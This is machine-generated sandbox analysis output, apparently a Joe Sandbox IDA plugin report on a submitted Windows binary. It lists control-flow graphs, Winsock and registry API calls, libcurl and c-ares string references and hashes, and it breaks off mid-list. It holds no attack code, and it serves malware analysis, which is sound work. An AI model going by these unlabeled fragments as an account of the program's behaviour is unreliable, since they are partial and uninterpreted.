1023->1029 1042 299cfd-299d0e call 28e960 1024->1042 1043 299ccf 1024->1043 1028->948 1029->948 1029->1028 1034->1015 1045 299be0-299bf4 call 296200 call 2967e0 1034->1045 1053 299d10 1042->1053 1054 299d53-299d55 1042->1054 1047 299cd1-299cec call 28e9f0 call 28e4a0 1043->1047 1045->1015 1062 299bfa-299c0b call 296320 1045->1062 1067 299cee-299cfb call 28e9d0 1047->1067 1068 299d47-299d51 1047->1068 1057 299d12-299d2d call 28e9f0 call 28e4a0 1053->1057 1060 299e69-299e8e call 28ea40 call 28e440 1054->1060 1085 299d5a-299d6f call 28e960 1057->1085 1086 299d2f-299d3c call 28e9d0 1057->1086 1081 299e90-299e92 1060->1081 1082 299e94-299eaa call 28e3c0 1060->1082 1078 299c11-299c1c call 297b70 1062->1078 1079 299b75-299b86 call 28ea00 1062->1079 1067->1042 1067->1047 1073 299dca-299ddb call 28e960 1068->1073 1090 299ddd-299ddf 1073->1090 1091 299e2e-299e36 1073->1091 1078->1006 1103 299c22-299c33 call 28e960 1078->1103 1079->1006 1100 299f2d 1079->1100 1088 299eb3-299ec4 call 28e9c0 1081->1088 1109 29a04a-29a04c 1082->1109 1110 299eb0-299eb1 1082->1110 1105 299d71-299d73 1085->1105 1106 299dc2 1085->1106 1086->1057 1112 299d3e-299d42 1086->1112 1088->948 1117 299eca-299ed0 1088->1117 1099 299e06-299e21 call 28e9f0 call 28e4a0 1090->1099 1096 299e38-299e3b 1091->1096 1097 299e3d-299e5b call 28ebf0 * 2 1091->1097 1096->1097 1107 299e5e-299e67 1096->1107 1097->1107 1140 299de1-299dee call 28ec80 1099->1140 1141 299e23-299e2c call 28eac0 1099->1141 1100->1023 1126 299c35 1103->1126 1127 299c66-299c75 call 2978a0 1103->1127 1115 299d9a-299db5 call 28e9f0 call 28e4a0 1105->1115 1106->1073 1107->1060 1107->1088 1120 29a04e-29a051 1109->1120 1121 29a057-29a070 call 28ebf0 * 2 1109->1121 1110->1088 1112->1060 1156 299d75-299d82 call 28ec80 1115->1156 1157 299db7-299dc0 call 28eac0 1115->1157 1124 299ee5-299ef2 call 28e9f0 1117->1124 1120->962 1120->1121 1121->1003 1124->948 1143 299ef8-299f0e call 28e440 1124->1143 1135 299c37-299c51 call 28e9f0 1126->1135 1148 299c7b-299c8f call 28e7c0 1127->1148 1149 29a011 1127->1149 1135->1006 1166 299c57-299c64 call 28e9d0 1135->1166 1159 299df1-299e04 call 28e960 1140->1159 1141->1159 1164 299f10-299f26 call 28e3c0 1143->1164 1165 299ed2-299edf call 28e9e0 1143->1165 1148->1006 1169 299c95-29a00e 1148->1169 1149->1012 1173 299d85-299d98 call 28e960 1156->1173 1157->1173 1159->1091 1159->1099 1164->1165 1182 299f28 1164->1182 1165->948 1165->1124 1166->1127 1166->1135 1169->1149 1173->1106 1173->1115 1182->962
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00299946
                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00299974
                                • RegCloseKey.KERNELBASE(?), ref: 0029998B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                • API String ID: 3677997916-4129964100
                                • Opcode ID: ad639c0a885fb9dbf6c3489c4793bf820b8a4f242cdb0a68acaeb7daef883c0e
                                • Instruction ID: 6793b2562b0071fdf6a5b6acf663b660fb1f57551f6f68ccf7e8e363d36fab6e
                                • Opcode Fuzzy Hash: ad639c0a885fb9dbf6c3489c4793bf820b8a4f242cdb0a68acaeb7daef883c0e
                                • Instruction Fuzzy Hash: 9D32B9B5924202ABEF11AF25EC42A1B76D4AF55324F084438FC4996263FB31ED74DB93

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1266 1d2f17-1d2f8c call 686430 call 686820 1271 1d31c9-1d31cd 1266->1271 1272 1d2f91-1d2ff4 call 1d1619 RegOpenKeyExA 1271->1272 1273 1d31d3-1d31d6 1271->1273 1276 1d2ffa-1d300b 1272->1276 1277 1d31c5 1272->1277 1278 1d315c-1d31ac RegEnumKeyExA 1276->1278 1277->1271 1279 1d3010-1d3083 call 1d1619 RegOpenKeyExA 1278->1279 1280 1d31b2-1d31c2 RegCloseKey 1278->1280 1283 1d314e-1d3152 1279->1283 1284 1d3089-1d30d4 RegQueryValueExA 1279->1284 1280->1277 1283->1278 1285 1d313b-1d314b RegCloseKey 1284->1285 1286 1d30d6-1d3137 call 686700 call 686790 call 686820 call 686630 call 686820 call 684b90 1284->1286 1285->1283 1286->1285
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: Xlw$Xlw$lw
                                • API String ID: 1332880857-1040989031
                                • Opcode ID: 67f73adb7b2633fedbba2ab960b69b4e169b576f5822cc4dd06ce36bb0f1fa8f
                                • Instruction ID: aa9e60fd227d21ca1611d5cdf3173c6d190efe94c575302f7f629071ffbcbc97
                                • Opcode Fuzzy Hash: 67f73adb7b2633fedbba2ab960b69b4e169b576f5822cc4dd06ce36bb0f1fa8f
                                • Instruction Fuzzy Hash: 9371B5B49043199FDB50EF69C58479EBBF0FF84308F10896DE99897305E7749A888F92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1392 208b50-208b69 1393 208be6 1392->1393 1394 208b6b-208b74 1392->1394 1397 208be9 1393->1397 1395 208b76-208b8d 1394->1395 1396 208beb-208bf2 1394->1396 1398 208bf3-208bfe call 20a550 1395->1398 1399 208b8f-208ba7 call 1e6e40 1395->1399 1397->1396 1404 208de4-208def 1398->1404 1405 208c04-208c08 1398->1405 1406 208cd9-208d16 SleepEx getsockopt 1399->1406 1407 208bad-208baf 1399->1407 1408 208df5-208e19 call 20a150 1404->1408 1409 208e8c-208e95 1404->1409 1410 208dbd-208dc3 1405->1410 1411 208c0e-208c1d 1405->1411 1414 208d22 1406->1414 1415 208d18-208d20 1406->1415 1412 208bb5-208bb9 1407->1412 1413 208ca6-208cb0 1407->1413 1449 208e88 1408->1449 1450 208e1b-208e26 1408->1450 1416 208f00-208f06 1409->1416 1417 208e97-208e9c 1409->1417 1410->1397 1419 208c35-208c48 call 20a150 1411->1419 1420 208c1f-208c30 connect 1411->1420 1412->1396 1422 208bbb-208bc2 1412->1422 1413->1406 1421 208cb2-208cb8 1413->1421 1423 208d26-208d39 1414->1423 1415->1423 1416->1396 1424 208e9e-208eb6 call 1e2a00 1417->1424 1425 208edf-208eef call 1d78b0 1417->1425 1451 208c4d-208c4f 1419->1451 1420->1419 1427 208ddc-208dde 1421->1427 1428 208cbe-208cd4 call 20b180 1421->1428 1422->1396 1429 208bc4-208bcc 1422->1429 1431 208d43-208d61 call 1ed8c0 call 20a150 1423->1431 1432 208d3b-208d3d 1423->1432 1424->1425 1448 208eb8-208edd call 1e3410 * 2 1424->1448 1453 208ef2-208efc 1425->1453 1427->1397 1427->1404 1428->1404 1437 208bd4-208bda 1429->1437 1438 208bce-208bd2 1429->1438 1454 208d66-208d74 1431->1454 1432->1427 1432->1431 1437->1396 1445 208bdc-208be1 1437->1445 1438->1396 1438->1437 1452 208dac-208db8 call 2150a0 1445->1452 1448->1453 1449->1409 1456 208e28-208e2c 1450->1456 1457 208e2e-208e85 call 1ed090 call 214fd0 1450->1457 1458 208c51-208c58 1451->1458 1459 208c8e-208c93 1451->1459 1452->1396 1453->1416 1454->1396 1463 208d7a-208d81 1454->1463 1456->1449 1456->1457 1457->1449 1458->1459 1466 208c5a-208c62 1458->1466 1461 208dc8-208dd9 call 20b100 1459->1461 1462 208c99-208c9f 1459->1462 1461->1427 1462->1413 1463->1396 1468 208d87-208d8f 1463->1468 1470 208c64-208c68 1466->1470 1471 208c6a-208c70 1466->1471 1473 208d91-208d95 1468->1473 1474 208d9b-208da1 1468->1474 1470->1459 1470->1471 1471->1459 1477 208c72-208c8b call 2150a0 1471->1477 1473->1396 1473->1474 1474->1396 1479 208da7 1474->1479 1477->1459 1479->1452
                                APIs
                                • connect.WS2_32(?,?,00000001), ref: 00208C30
                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00208CF3
                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00208D0F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Sleepconnectgetsockopt
                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                • API String ID: 1669343778-879669977
                                • Opcode ID: dc3d9c4e64f2379cdcc6b53a69b2dcb4d85e46121fe0626a7d39ba5914fded76
                                • Instruction ID: b29892ba5f9247d9ffff902dab44e93d4b4382158bce85fca2c3f0b43c6fcc7a
                                • Opcode Fuzzy Hash: dc3d9c4e64f2379cdcc6b53a69b2dcb4d85e46121fe0626a7d39ba5914fded76
                                • Instruction Fuzzy Hash: EDB1B170614706AFDB14CF24C985BA7B7E0AF55318F048629E89D8B2D3DB71EC64CB61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1485 209290-2092ed call 1d76a0 1488 2093c3-2093ce 1485->1488 1489 2092f3-2092fb 1485->1489 1498 2093d0-2093e1 1488->1498 1499 2093e5-209427 call 1ed090 call 214f40 1488->1499 1490 209301-209333 call 1ed8c0 call 1ed9a0 1489->1490 1491 2093aa-2093af 1489->1491 1510 209335-209364 WSAIoctl 1490->1510 1511 2093a7 1490->1511 1492 2093b5-2093bc 1491->1492 1493 209456-209470 1491->1493 1496 209429-209431 1492->1496 1497 2093be 1492->1497 1501 209433-209437 1496->1501 1502 209439-20943f 1496->1502 1497->1493 1498->1492 1503 2093e3 1498->1503 1499->1493 1499->1496 1501->1493 1501->1502 1502->1493 1506 209441-209453 call 2150a0 1502->1506 1503->1493 1506->1493 1514 209366-20936f 1510->1514 1515 20939b-2093a4 1510->1515 1511->1491 1514->1515 1517 209371-209390 setsockopt 1514->1517 1515->1511 1517->1515 1518 209392-209395 1517->1518 1518->1515
                                APIs
                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0020935D
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00209388
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Ioctlsetsockopt
                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                • API String ID: 1903391676-2691795271
                                • Opcode ID: 0a8e2467e081c0c8c752ad5ece583377bc2cb07be53c93ab4c2c98f19c987b89
                                • Instruction ID: 64b2cb0299bfe0ff95c35f71b6c0b79cd62d6c4c9ff5fe70c0115ef5c420a075
                                • Opcode Fuzzy Hash: 0a8e2467e081c0c8c752ad5ece583377bc2cb07be53c93ab4c2c98f19c987b89
                                • Instruction Fuzzy Hash: FF51C170604305ABDB10DF24C881FAAB7A5FF88314F148569FD489B2C3E770E9A1CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1519 1d76a0-1d76be 1520 1d76e6-1d76f2 send 1519->1520 1521 1d76c0-1d76c7 1519->1521 1523 1d775e-1d7762 1520->1523 1524 1d76f4-1d7709 call 1d72a0 1520->1524 1521->1520 1522 1d76c9-1d76d1 1521->1522 1525 1d770b-1d7759 call 1d72a0 call 1dcb20 call 558c50 1522->1525 1526 1d76d3-1d76e4 1522->1526 1524->1523 1525->1523 1526->1524
                                APIs
                                • send.WS2_32(multi.c,?,?,?,001D3D4E,00000000,?,?,001E07BF), ref: 001D76EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: send
                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                • API String ID: 2809346765-3388739168
                                • Opcode ID: 6ac0776d7e3abac552222f42553bf97434b5a73d7030d834f7b171ad111c2865
                                • Instruction ID: 1d2227a1731696669aad019e8798305c4170685912f3aa27a154c64043aa6639
                                • Opcode Fuzzy Hash: 6ac0776d7e3abac552222f42553bf97434b5a73d7030d834f7b171ad111c2865
                                • Instruction Fuzzy Hash: 18115CF161CB457BE514A7189C8AD277B6CEBC1B68F450D1AFC08A3381F3619C04C6B1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1638 1d75e0-1d75ed 1639 1d75ef-1d75f6 1638->1639 1640 1d7607-1d7629 socket 1638->1640 1639->1640 1641 1d75f8-1d75ff 1639->1641 1642 1d763f-1d7642 1640->1642 1643 1d762b-1d763c call 1d72a0 1640->1643 1644 1d7601-1d7602 1641->1644 1645 1d7643-1d7699 call 1d72a0 call 1dcb20 call 558c50 1641->1645 1643->1642 1644->1640
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: socket
                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                • API String ID: 98920635-842387772
                                • Opcode ID: 5db78509a91ef929fcc2d1a322ae9d0df067964e06a7fa8ee9839d00f8b55b00
                                • Instruction ID: 6e9d7bdbb0cc2330084eb92ece0dce1b4f0f07f3577762e0d775ee39dcc4665e
                                • Opcode Fuzzy Hash: 5db78509a91ef929fcc2d1a322ae9d0df067964e06a7fa8ee9839d00f8b55b00
                                • Instruction Fuzzy Hash: 03114CB1A04B5227DA11677C6C47F9B3B54EF81764F044926F814963D2F361CC64C6E1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1747 20a150-20a159 1748 20a250 1747->1748 1749 20a15f-20a17b 1747->1749 1750 20a181-20a1ce getsockname 1749->1750 1751 20a249-20a24f 1749->1751 1752 20a1d0-20a1f5 call 1ed090 1750->1752 1753 20a1f7-20a214 call 20ef30 1750->1753 1751->1748 1760 20a240-20a246 call 214f40 1752->1760 1753->1751 1757 20a216-20a23b call 1ed090 1753->1757 1757->1760 1760->1751
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0020A1C6
                                Strings
                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0020A23B
                                • getsockname() failed with errno %d: %s, xrefs: 0020A1F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                • API String ID: 3358416759-2605427207
                                • Opcode ID: 2227ca180b5b6a0078211408aa62e62939db2ff6ba4000cbd1b6c758556681d7
                                • Instruction ID: b04ff16409f648d14508f77ada2467edf83ea011cd0ddc2ac7841f86fe4009e8
                                • Opcode Fuzzy Hash: 2227ca180b5b6a0078211408aa62e62939db2ff6ba4000cbd1b6c758556681d7
                                • Instruction Fuzzy Hash: D121F871858780AAF7259B28DC46FE773BCEF91324F040614F98853192FB32599987E2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1767 1ed5e0-1ed5ee 1768 1ed652-1ed662 WSAStartup 1767->1768 1769 1ed5f0-1ed604 call 1ed690 1767->1769 1770 1ed664-1ed66f 1768->1770 1771 1ed670-1ed676 1768->1771 1775 1ed61b-1ed651 call 1f7620 1769->1775 1776 1ed606-1ed614 1769->1776 1771->1769 1774 1ed67c-1ed68d 1771->1774 1776->1775 1781 1ed616 1776->1781 1781->1775
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 001ED65B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
